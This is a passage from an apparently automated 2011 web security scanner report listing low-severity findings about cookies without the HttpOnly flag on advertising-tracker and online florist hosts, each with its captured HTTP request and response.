Set-Cookie: rsi_us_1000000="pUMlIz9DOAYU1O2Wc/EoGVYZpEdtFa0wkO3LcjYdMedG/503vY5t8QC5qXOSo49tlyo/SaXH5wQBQZoGx8vtub+wYEktHO6BM//uLrdNXC73GW2RoRccmRRxz8iNhj4BKt+Y1QbBr3hgo7XOn3j5NZwUH6cpGC/PhQP2yc3oMfwqw4P2G8L/1MLWiPQkNLjS6Q0ULgZUseZorMWeIlvn6tAf+I16Wc7DPgWwgxsVI+qfMtmvXhiXCCZxxHkTzrS2Qx9wJGinCc3C6IbEK6L+bOM/d0zvNcSiV/bnXGaM0oXMywF54yMGDQbgxlX6KiaXi5cecO3tNy2uyZvsphzHiMKU415xoLFWR5vIUqqtZ3p0I7MdNQAymt+azR1IgoeyLFHonQV/rmbDVyBrQ7w/ZU1q3kPLNZqCoV19V8Ng3RcmgDNs2ztcqJiJ2FYpYHHLExFXt/kMkEKU12WDAShkamQ4oh7wVtvb3SIZvhlglQ4XK1myJJ70E2cGE993JVtFB4ZSDzI5mD1ULHX5ipqiAWCc57KD4ahZqh2uhYR03AikbGwMyjC9INZnFYCGISKHvOyJMMCqXuslvb0LOqdL1CNF73QC3mlmmAsFkg/Z1N0Lcju2xYkR/w04GSY87iblMN4vGedpKxyOty8WBEY5zR3PoeJAPW813IlvGKI+vrtPOnhXkDl5GFfXyOuzVksBDR0aU4odjaj9Ydllfjz9gXcpchwizlcc8yJtNAoSVT5blL4wWQnXBp1X4EqMI7rXbc2BxYFveNmgFDHak3Uv1aahWQUTA37C+/jHID6QBEXvvXL38cgHFdC0+wVBE1/bEJPHD7RgiMULCYDRnuBB7vb4bw8EkraqsFwTCQuECl9FE+xV5gwdL+Zs43PrB8Wbzo32CFjasjNqoLC4uGfrDe3/4eIPomh2R7O0wqTgfeQqm7U7MZWjGEQax9tHfZ9cjVmQ2luC27SJVuBpsVgTENVuoPj9sPHfqlx1OKzRXsxBXVNMuNB8zsGaobxo3NEaQgb7bxzMy2YaItXeP1SshknEbvQGIG4gNeqfOi/f7owgltGCxoApuUOYoQo/GRHlyUtX7dJav8HzMCoSk8O/hBCdS2FWBCkjLh7ZHlOb5iwL5/G417cICEUUFpp0bAIolhPhljmnqXaeGGY4TATTuQd2sr2shKgIr9MeXfVXfK40jfgXLDr0cBPoR5w9pbOynqLgwtjdFtf9K0Tco2eQSbv3Sgx1M83lReyDnC4n4v2FIK8kb1JyDlcPIVSllALhBZa00InWMpvYzctsjkNfujaODeQ7HB4rHCcl3yKE4UR5iHJH6uF4QRvCiaEM7wK91IOM7w2RPnXJnsR3YNyLRd4ZB2HJPpFnqTEi/5U+fnusYeCe5OxMsM54Lrvi9prlub16W1NfBaKhZjCDJtb9MgIIHzFj7bkX2/w7hpvWSvyy5VBHJrbpjHQ76isdLqMJ9Whj7/Rb+y0+VUxwk2q++4qHdrARV+JAkDbTDpleLUYiMgukHEmKgP3o6ijg5npUPykZ+K/RHXzZWBsOQLYEXSb//xDOXa7h7odolJp7vXr+/5s="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Location: http://ad.yieldmanager.com/pixel?id=987677&t=2
Content-Length: 0
Date: Mon, 09 May 2011 01:15:43 GMT

13.32. http://ads.undertone.com/fc.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.undertone.com
Path:   /fc.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /fc.php?pid=1913&cb=[timestamp] HTTP/1.1
Host: ads.undertone.com
Proxy-Connection: keep-alive
Referer: http://pixel.fetchback.com/serve/fb/pdc?cat=&name=landing&sid=3006&abandon_products=91637
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A28X=3_S1AJfxMx2CJFEtQQMeQV5diyE3zkHiXbsKc_2m5v-uGbX8yi3ngzw; __qca=P0-1848023807-1303907386404; UTLIA=205196.lkp9l1-4837_194060.lkb9de-4837; UTID=55d8a64add1842aca1cd9b7525609299; UTPROFILES=15103%2317%3A3%7C22%3A13_5%2C4%7C23%3A13_5%2C4%7C1022%3A13_5%2C4_3%7C1023%3A13_5%2C4_3%7C1146%3A13_5%2C4_3%7C1147%3A13_5%2C4_3%7C1152%3A5%2C4_3%7C1155%3A13%7C1158%3A5%2C4_3%7C1724%3A5%2C4_3%7C1816%3A5%2C4%7C1913%3A1%7C2878%3A13_5%2C4_3%7C2881%3A13_5%2C4_3%7C2882%3A5%2C4_3%7C2886%3A13%7C2892%3A5%2C4_3%7C2894%3A13_5%2C4_3%7C2895%3A5%2C4_3%7C2896%3A5%2C4_3%7C2897%3A13_5%2C4_3%7C2898%3A13_5%2C4_3%7C2900%3A13%7C2901%3A13_5%2C4_3%7C2903%3A5%2C4_3%7C2909%3A13_5%2C4_3%7C2917%3A13%7C2918%3A5%2C4_3%7C2922%3A13_5%2C4_3%7C2923%3A13%7C2924%3A13_5%2C4_3%7C2925%3A13_5%2C4_3%7C2926%3A5%2C4_3

Response

HTTP/1.1 200 OK
Server: Apache
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSDo OUR BUS UNI COM NAV"
Content-Length: 43
Content-Type: image/gif
Date: Mon, 09 May 2011 01:02:39 GMT
Connection: close
Set-Cookie: UTID=55d8a64add1842aca1cd9b7525609299; expires=Tue, 08-May-2012 01:02:39 GMT; path=/
Set-Cookie: UTPROFILES=15103%2317%3A3%7C22%3A13_5%2C4%7C23%3A13_5%2C4%7C1022%3A13_5%2C4_3%7C1023%3A13_5%2C4_3%7C1146%3A13_5%2C4_3%7C1147%3A13_5%2C4_3%7C1152%3A5%2C4_3%7C1155%3A13%7C1158%3A5%2C4_3%7C1724%3A5%2C4_3%7C1816%3A5%2C4%7C1913%3A1%2C2%7C2878%3A13_5%2C4_3%7C2881%3A13_5%2C4_3%7C2882%3A5%2C4_3%7C2886%3A13%7C2892%3A5%2C4_3%7C2894%3A13_5%2C4_3%7C2895%3A5%2C4_3%7C2896%3A5%2C4_3%7C2897%3A13_5%2C4_3%7C2898%3A13_5%2C4_3%7C2900%3A13%7C2901%3A13_5%2C4_3%7C2903%3A5%2C4_3%7C2909%3A13_5%2C4_3%7C2917%3A13%7C2918%3A5%2C4_3%7C2922%3A13_5%2C4_3%7C2923%3A13%7C2924%3A13_5%2C4_3%7C2925%3A13_5%2C4_3%7C2926%3A5%2C4_3; expires=Sun, 07-Aug-2011 01:02:39 GMT; path=/

GIF89a.............!.......,...........D..;
13.33. http://at.amgdgt.com/ads/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://at.amgdgt.com
Path:   /ads/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ads/?t=pp&px=13078&rnd=[cachebuster] HTTP/1.1
Host: at.amgdgt.com
Proxy-Connection: keep-alive
Referer: http://adsfac.us/pct_mx.asp?L=305606&source=if
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ID=AAAAAQAU6fB5bLIqJTbWvlzW3Ft0OcZJYxcAANGoPMSHa0D5h6539_dUjA0AAAEvZiIaJw--; LO=AAAAAQAUYn__ZmG8acLIZhvDLvm3d2V86m4BAHVzYTt2dDs1MjM7c3Rvd2U7MDU2NzI7c29mdGxheWVyIHRlY2hub2xvZ2llcyBpbmMuO2Jyb2FkYmFuZDsxNzMuMTkzLjIxNC4yNDM-; UA=AAAAAQAUB0TYJEwPaU_7WDI3ccZVAq.0_foDA3gBY2BgEGFgWnCTgSW7jYGR9zsDww0XBgYGTgYGRv0j_xZYQeVagXI_gHKuMLlNHp0ZuPRtvBk3GSrXAtT3E6jPDaZvo_lNE5z6zNP1cctJMDAwdS4BurMZaOYvoJnuMDMn6Uf4Q.Uw3NnLsc0bKofhll4Ol35cch3ZMadwyiW5XccpF.F1Daec34QQnHKuDRxQOYx46JBwv41Tn4SdNi597Sd3bsKlr_3kjFqccieEF.OUO7bgETDcGXHKV3YLAeUZfA9bMTBwABPSTkYeRgaGwFuMfECKwYCbgZGZhYWflZGNkZ2Rg5GTkYuRG6xCwQxMLS0AK2TJZBQEqmcJYRJkFAIy5HdxsrBgagKnUWuQfQwMANDqkkE-

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Set-Cookie: UA=AAAAAQAUinufEXt9HLZETnIErylkCGzd0C4DA3gBY2BgEGFgWnCTgSW7jYGR9zsDww0XBgYGTgYGRv0j_xZYQeVagXI_gHKuMLlNHp0ZuPRtvBk3GSrXAtT3E6jPDaZvo_lNE5z6zNP1cctJMDAwdS4BurMZaOYvoJnuMDMn6Uf4Q.Uw3NnLsc0bKofhll4Ol35cch3ZMadwyiW5XccpF.F1Daec34QQnHKuDRxQOYx46JBwv41Tn4SdNi597Sd3bsKlr_3kjFqccieEF.OUO7bgETDcGXHKV3YLAeUZfI_rNYBSUeAtRkFGYHraycgPpBgMeJgZWZnZ.NkZORg5GbkYuRl5GHkZ.cCSLJmMIkA1SwvAOhTMIIIhTCKMokBh.V1cbMzYtC12ZwQ6B5hcL7kuuwKymoEBAFhQk_g-; Domain=.amgdgt.com; Expires=Wed, 08-Jun-2011 01:01:10 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache, no-store
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Location: http://ib.adnxs.com/seg?add=99220&t=2
Content-Length: 0
Date: Mon, 09 May 2011 01:01:09 GMT

13.34. http://b.scorecardresearch.com/b  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=7&c2=8097938&rn=1235633084&c7=http%3A%2F%2Fseg.sharethis.com%2FgetSegment.php%3Fpurl%3Dhttp%253A%252F%252Fww30.1800baskets.com%252Fproduct.do%253FbaseCode%253D93260%2526dataset%253D11309%26jsref%3Dhttp%253A%252F%252Fww30.1800baskets.com%252Ftemplate.do%253Fid%253Dtemplate3%2526page%253D2000%26rnd%3D1304903453531&c3=8097938&c8=ShareThis%20Segmenter&c9=http%3A%2F%2Fww30.1800baskets.com%2Fproduct.do%3FbaseCode%3D93260%26dataset%3D11309&cv=2.2&cs=js HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://seg.sharethis.com/getSegment.php?purl=http%3A%2F%2Fww30.1800baskets.com%2Fproduct.do%3FbaseCode%3D93260%26dataset%3D11309&jsref=http%3A%2F%2Fww30.1800baskets.com%2Ftemplate.do%3Fid%3Dtemplate3%26page%3D2000&rnd=1304903453531
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Mon, 09 May 2011 01:18:23 GMT
Connection: close
Set-Cookie: UID=25894b9d-24.143.206.177-1303083414; expires=Wed, 08-May-2013 01:18:23 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

13.35. http://blooms.1800flowers.com/cm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blooms.1800flowers.com
Path:   /cm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /cm?ci=90074784&st=1304902848067&vn1=4.8.3H&ec=utf-8&vn2=e4.0&pi=w-Welcome%20Page&ul=http%3A%2F%2Fww30.1800flowers.com%2F&tid=6&cg=w&rnd=1304912507230&pc=Y&jv=1.5&np0=Shockwave%2520Flash&np1=Java%2520Deployment%2520Toolkit%25206.0.240.7&np2=Java(TM)%2520Platform%2520SE%25206%2520U24&np3=Silverlight%2520Plug-In&np4=Chrome%2520PDF%2520Viewer&np5=Google%2520Gears%25200.5.33.0&np6=WPI%2520Detector%25201.3&np7=Google%2520Update&np8=Default%2520Plug-in&je=y&sw=1920&sh=1200&pd=16&tz=5&cvdone=p HTTP/1.1
Host: blooms.1800flowers.com
Proxy-Connection: keep-alive
Referer: http://ww30.1800flowers.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FSESSIONID=847b741e4593439b8e3ed6040ba46630; brandCode=1001; ShopperManagerEnterprise=aed35ad7-54a3-48bc-a8e0-0c9f3d76e618; CoreID6=70101304902850161284526; TestSess3=70101304902850161284526

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:00:56 GMT
Server: Apache
P3P: CP="NON DSP COR CUR ADMo DEVo PSAo PSDo OUR IND ONL UNI PUR COM NAV INT DEM STA"
Set-Cookie: 90074784_login=1304902856018461671490074784; path=/
Set-Cookie: 90074784_reset=1304902856;path=/
Expires: Sun, 08 May 2011 07:00:56 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, pre-check=0, post-check=0, private
Pragma: no-cache
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,........@..D..;
13.36. http://ftd.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ftd.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: ftd.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 301 Moved Permanently
Server: Apache
Set-Cookie: TLTSID=B1F84B9079D7107900059731C6D04BB5; Path=/
Set-Cookie: TLTUID=B1F84B9079D7107900059731C6D04BB5; Path=/; expires=Mon, 09-05-2021 01:00:13 GMT
Location: http://www.ftd.com/
Content-Type: text/html; charset=iso-8859-1
Content-Length: 346
Date: Mon, 09 May 2011 01:00:13 GMT
X-Varnish: 1301368678
Age: 0
Via: 1.1 varnish
Connection: keep-alive

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>301 Moved Permanently</TITLE>
</HEAD><BODY>
<H1>Moved Permanently</H1>
The document has moved <A HREF="http://www.ftd.com/">here<
...[SNIP]...
13.37. http://idcs.interclick.com/Segment.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://idcs.interclick.com
Path:   /Segment.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Segment.aspx?sid=b053470b-90a6-47ab-9052-d6a092e04e08 HTTP/1.1
Host: idcs.interclick.com
Proxy-Connection: keep-alive
Referer: http://pixel.fetchback.com/serve/fb/pdc?cat=&name=landing&sid=3006&abandon_products=91637
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: T=1; uid=u=c3e2564e-78bb-4fe5-b016-9ebe8e804603; tpd=e20=1305834684215&e90=1303847484419&e50=1305834684416&e100=1303847484462; sgm=8239=734250&8144=734251&9621=734251&9234=734252&9622=734254&7901=734255&7472=734256&10677=734260

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 43
Content-Type: image/gif
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: sgm=8239=734250&8144=734251&9621=734251&9234=734252&9622=734254&7901=734255&7472=734256&10677=734260&9174=734264; domain=.interclick.com; expires=Sun, 09-May-2021 01:04:51 GMT; path=/
X-Powered-By: ASP.NET
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Date: Mon, 09 May 2011 01:04:51 GMT

GIF89a.............!.......,...........D..;
13.38. http://leadback.advertising.com/adcedge/lb  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://leadback.advertising.com
Path:   /adcedge/lb

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adcedge/lb?site=695501&srvc=1&betr=birthdaysmiles_cs=1&betq=12580=431215 HTTP/1.1
Host: leadback.advertising.com
Proxy-Connection: keep-alive
Referer: http://adsfac.us/pct_mx.asp?L=305606&source=if
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=aw960013034229720018; aceRTB=rm%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cam%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cdc%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Can%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Crub%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7C; SESSece087221ae81b2ccde2334499ee4548=d138b6ea0107f86bc8ce8957059b7431; s_pers=%20s_getnr%3D1304388622973-New%7C1367460622973%3B%20s_nrgvo%3DNew%7C1367460622975%3B; GUID=MTMwNDc2NzUwMjsxOjE2cjRvcHExdHZsa21sOjM2NQ; C2=jsYxN5pqDIxFG+sovQg3sYIdSK8BItdxPfQ3WX8zHsY4F/8Bw3gxPfQ7NY8zHoLOG/8BKGexPfwmhX8zH8eDG/8BdDmxPfwohX8zHQY4F/8BYimxPfA3Wa8zHoa4F/8BA9qxPfgdeZ8zH4fFG/8BbTexPfwKOa8zHoN5F/8BC9qxPfwtZa8zHE0rG/8BFBqxPfQTaa8zHY4dG/8BNLqxPXrqEoxsGSXtrSQIzaEoRGABg2cBJbm5IaAqxOCBsRpxg2I9IsfzFA3i4SQBwWY0ltCqGkNseSw7Ra83VSPBrLqhRPJUEQT2F/NruTQAzZ830KHBbzqxfn6BE8sXG/NogVwrgYQZzWdBkoqhzO67FcNNGuekAbwuRXA1um/BEOphBMLUHsEpGyAq+fQoeZsEfO8BgwhR6U7/HUJtGgZZpTrBQHqFH09IG4co8ew5qY8zY6wBsMiRteAnjaUrHEv9F1aqGhQ9fZ8WFirZDugBoC; F1=B8ziF3kAAAAAgCsCAEAAgEABAAAABAAAAMAAgEA; BASE=Rgwq9yEw9v+atCAoEOaIRHpvOehiQ9Sa8LM+diGiDsajKw8yV1LAPA7+GvRiJhbJt6Hv50y77rIfdG5+2unWu4QL44U5Tp5J7h57WACK9DFolo7ZgEE+TO66LxZCWBHxwyDEc8c4CpUSJWcFkgw700b6zAWA9p1kL5hoC+WRIuMIIHq0xcOEQ9R2J3eAQ44q0qPrQrsF+Mlvp1J!; ROLL=boAnq2C+ORAgHEGte/mz/DHyJN5VpuB!

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 09 May 2011 01:01:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Set-Cookie: C2=NzzxN5pqDIxFGMnovQg3sYAGSK8BItdRzdQ3WX0cHsY4FN3Bw3gRzdQ7NY0cHoLOGN3BKGeRzdwmhX0cH8eDGN3BdDmRzdwohX0cHQY4FN3BYimRzdA3Wa0cHoa4FN3BA9qRzdgdeZ0cH4fFGN3BbTeRzdwKOa0cHoN5FN3BC9qRzdwtZa0cHE0rGN3BFBqRzdQTaa0cHY4dGN3BNLqRzVrqEoxsGgRtrSQIza8QRGABg2chsZm5Ia4SxOCBsRpRE1I9IsfzFOxi4SQBwWQdltCqGyHseSw7Ra0gVSPBrLqB1NJUEQT2FNIruTQAzZ0g0KHBbzqRDm6BE8sXGNIogVwrgYICzWdBkoqBXN67FcNNG8YkAbwuRX4dumvBEOpBlOLUGsEpGALq+bQoeZktfOsBgwhxdX7/HUJtGuTZpTrhzFqFH09IGGXo8ew5qY0cY6wBsMixQdAnjaMUHEv9FDVqGdQ9fZ0/FirZDughLFLJI8GlGAH; domain=advertising.com; expires=Wed, 08-May-2013 01:01:01 GMT; path=/
Set-Cookie: GUID=MTMwNDkwMjg2MTsxOjE2cjRvcHExdHZsa21sOjM2NQ; domain=advertising.com; expires=Wed, 08-May-2013 01:01:01 GMT; path=/
Set-Cookie: DBC=; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Cache-Control: private, max-age=3600
Expires: Mon, 09 May 2011 02:01:01 GMT
Content-Type: image/gif
Content-Length: 49

GIF89a...................!.......,...........T..;
13.39. http://login.dotomi.com/ucm/UCMController  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://login.dotomi.com
Path:   /ucm/UCMController

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ucm/UCMController?dtm_com=28&dtm_cid=2024&dtm_cmagic=07811d&dtm_fid=101&dtm_format=5&cli_promo_id=4&dtmc_scat_id=PBS&dtmc_prod_id=30003767&dtmc_ref=http%3A//www.proflowers.com/house-plants-PBS%3Ftile%3Dhmpg_podA%26Ref%3DHomeNoRef HTTP/1.1
Host: login.dotomi.com
Proxy-Connection: keep-alive
Referer: http://products.proflowers.com/flowers/The-Ultimate-Office-Plant-30003767?viewpos=6&trackingpgroup=PBS&tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 12:12:37 GMT
X-Name: dmc-o01
Set-Cookie: Apache=173.193.214.243.1304943157404326; path=/
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, private
P3P: "policyref="/w3c/p3p.xml", CP="NOI DSP NID OUR STP""
Content-Type: text/html
Content-Length: 191

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<meta http-equiv="Content-Type" content="text/html;charset=UTF-8">
</head>

<body>

</body>
</html>
13.40. http://metrics.ftd.com/b/ss/ftdprod/1/H.4-pdv-2/s48131725573912  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://metrics.ftd.com
Path:   /b/ss/ftdprod/1/H.4-pdv-2/s48131725573912

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/ftdprod/1/H.4-pdv-2/s48131725573912?[AQB]&ndh=1&t=8/4/2011%2020%3A0%3A34%200%20300&ns=ftdcom&pageName=Home%20Page&g=http%3A//www.ftd.com/&r=http%3A//www.ftd.com/&cc=USD&events=event13&c1=351&v1=351&c2=Main%20Site&v2=Main%20Site&c3=Main%20Site&v3=Main%20Site&c4=Main&v4=Main&c5=351%3AHome%20Page&c6=Main%20Site%3AHome%20Page&c7=Main%20Site%3AHome%20Page&c8=Main%3AHome%20Page&s=1920x1200&c=16&j=1.3&v=Y&k=Y&bw=1066&bh=968&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&[AQE] HTTP/1.1
Host: metrics.ftd.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=B5E9452E79D710790019CAE77C984B85; TLTUID=B5E9452E79D710790019CAE77C984B85; markcode=351; v_id=82914762190364346423402455244690; s_id=68151206806989154919581810926832; fsr.a=1304902834223; c1=%7B%22continue_shopping%22%3A%22%7B%5C%22name%5C%22%3A%5C%22Home%20Page%5C%22%2C%5C%22type%5C%22%3A%5C%22home%5C%22%2C%5C%22value%5C%22%3A%5C%22%252F%253Fmarkcode%253D351%5C%22%7D%22%7D; s_cc=true; si_path=1304902834891; bcp_path=1304902834891; scp_path=1304902834891; pp_path=1304902834891

Response

HTTP/1.1 302 Found
Date: Mon, 09 May 2011 01:00:37 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi=[CS]v1|26E39E5A851D2CAB-6000010360000EE4[CE]; Expires=Sat, 7 May 2016 01:00:37 GMT; Domain=.ftd.com; Path=/
Location: http://metrics.ftd.com/b/ss/ftdprod/1/H.4-pdv-2/s48131725573912?AQB=1&pccr=true&vidn=26E39E5A851D2CAB-6000010360000EE4&&ndh=1&t=8/4/2011%2020%3A0%3A34%200%20300&ns=ftdcom&pageName=Home%20Page&g=http%3A//www.ftd.com/&r=http%3A//www.ftd.com/&cc=USD&events=event13&c1=351&v1=351&c2=Main%20Site&v2=Main%20Site&c3=Main%20Site&v3=Main%20Site&c4=Main&v4=Main&c5=351%3AHome%20Page&c6=Main%20Site%3AHome%20Page&c7=Main%20Site%3AHome%20Page&c8=Main%3AHome%20Page&s=1920x1200&c=16&j=1.3&v=Y&k=Y&bw=1066&bh=968&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1
X-C: ms-4.4.1
Expires: Sun, 08 May 2011 01:00:37 GMT
Last-Modified: Tue, 10 May 2011 01:00:37 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www27
Content-Length: 0
Content-Type: text/plain

13.41. http://pix04.revsci.net/K10145/a3/0/3/pg.302  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /K10145/a3/0/3/pg.302

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /K10145/a3/0/3/pg.302?D=DM_LOC%3Dhttp%253A%252F%252F1800flowers.com%252Fproduct&tgt=http%3A%2F%2Fads.revsci.net%2Fadserver%2Fako%3Factivate%26type%3Dgif%26csid%3DK10145 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://adsfac.us/pct_mx.asp?L=305608&source=if
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
